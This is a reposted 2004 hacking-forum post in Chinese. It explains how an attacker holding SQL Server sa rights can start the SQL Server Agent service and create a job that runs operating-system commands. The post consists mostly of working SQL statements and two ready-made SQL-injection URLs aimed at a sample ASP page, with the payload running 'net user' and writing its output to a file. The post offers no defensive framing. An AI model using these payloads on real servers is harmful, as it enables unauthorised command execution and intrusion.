[转载]Sa权限使用SQLSERVERAGENT的计划任务运行程序

exploit

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 1449
精华: 90
积分: 8884
阅读权限: 100
性别: 男
来自: 河北
在线时间: 153 小时
注册时间: 2013-12-25
最后登录: 2007-4-6

优秀管理奖资料收集奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-12-15 03:04 只看该作者

[转载]Sa权限使用SQLSERVERAGENT的计划任务运行程序

来源:http://www.haiyang.net/safety/book/show.asp?id=1174

第一步:：
exec master.dbo.xp_servicecontrol <|>start<|>,<|>SQLSERVERAGENT<|>

第二步：
use msdb exec sp_delete_job null,<|>x<|> exec sp_add_job <|>x<|> exec sp_add_jobstep Null,<|>x<|>,Null,<|>1<|>,<|>CMDEXEC<|>,<|>cmd /c net user>c:\a.txt<|> exec sp_add_jobserver Null,<|>x<|>,@@servername exec sp_start_job <|>x<|>

就ok了，比如：

http://10.0.0.1/test.asp?a=administrator<|>;exec%20master.dbo.xp_servicecontrol%20<|>start<|>,<|>SQLSERVERAGENT<|>;--

http://10.0.0.1/test.asp?a=administrator<|>;use%20msdb%20exec%20sp_delete_job%20null,<|>x<|>%20exec%20sp_add_job%20<|>x<|>%20exec%20sp_add_jobstep%20Null,<|>x<|>,Null,<|>1<|>,<|>CMDEXEC<|>,<|>cmd%20/c%20net%20user>c:\a.txt<|>%20exec%20sp_add_jobserver%20Null,<|>x<|>,@@servername%20exec%20sp_start_job%20<|>x<|>;--

益友网吧联盟 http://www.96-7.com

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]Sa权限使用SQLSERVERAGENT的计划任务运行程序